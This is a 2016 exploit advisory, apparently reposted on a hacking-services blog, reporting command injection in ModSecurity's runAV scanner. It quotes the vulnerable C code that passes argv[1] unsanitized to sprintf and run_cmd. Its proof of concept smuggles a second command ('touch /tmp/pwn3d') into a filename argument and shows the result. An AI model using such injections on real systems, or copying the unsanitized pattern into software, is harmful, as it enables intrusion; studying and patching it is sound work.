Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    86386309

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
# Title : runAV mod_security Remote Command Execution
# Date : 13/05/2016
# Author : R-73eN
# Tested on : mod_security with runAV Linux 4.2.0-30-generic #36-Ubuntu SMP Fri Feb 26 00:57:19 UTC 2016 i686 i686 i686 GNU/Linux
# Software : https://github.com/SpiderLabs/owasp-modsecurity-crs/tree/master/util/av-scanning/runAV
# Vendor : https://www.modsecurity.org/
#  ___        __        ____                 _    _  
# |_ _|_ __  / _| ___  / ___| ___ _ __      / \  | |    
#  | || '_ \| |_ / _ \| |  _ / _ \ '_ \    / _ \ | |    
#  | || | | |  _| (_) | |_| |  __/ | | |  / ___ \| |___ 
# |___|_| |_|_|  \___/ \____|\___|_| |_| /_/   \_\_____|
#
#



#include "common.h"

main(int argc, char *argv[])
{
	char cmd[MAX_OUTPUT_SIZE];
	char output[MAX_OUTPUT_SIZE];
	int error;
	char *colon;
	char *keyword;

	if (argc > 1) {
		sprintf (cmd, "/usr/bin/clamscan --no-summary %s", argv[1]);
		output[0] = '\0';
		error = run_cmd(cmd,output,MAX_OUTPUT_SIZE);

+++++++++++++++++ OTHER CODE +++++++++++++++++++++++++++++++++


The argv[1] parameter is passed unsanitized to a sprintf function which sends the formatted output to the cmd variable,
which is later passed as a parameter to a run_cmd function on line 14.
https://github.com/SpiderLabs/owasp-modsecurity-crs/blob/master/util/av-scanning/runAV/runAV.c#L14

POC:

snort@snort-VirtualBox:/usr/share/modsecurity-crs/util/av-scanning/runAV$ ./runAV "foo.php;touch /tmp/pwn3d"
sh: 1: /usr/bin/clamscan: not found
1 exec empty: OK
snort@snort-VirtualBox:/usr/share/modsecurity-crs/util/av-scanning/runAV$ ls -la /tmp/ | grep pwn3d
-rw-rw-r--  1 snort snort    0 Maj 13 16:45 pwn3d
snort@snort-VirtualBox:/usr/share/modsecurity-crs/util/av-scanning/runAV$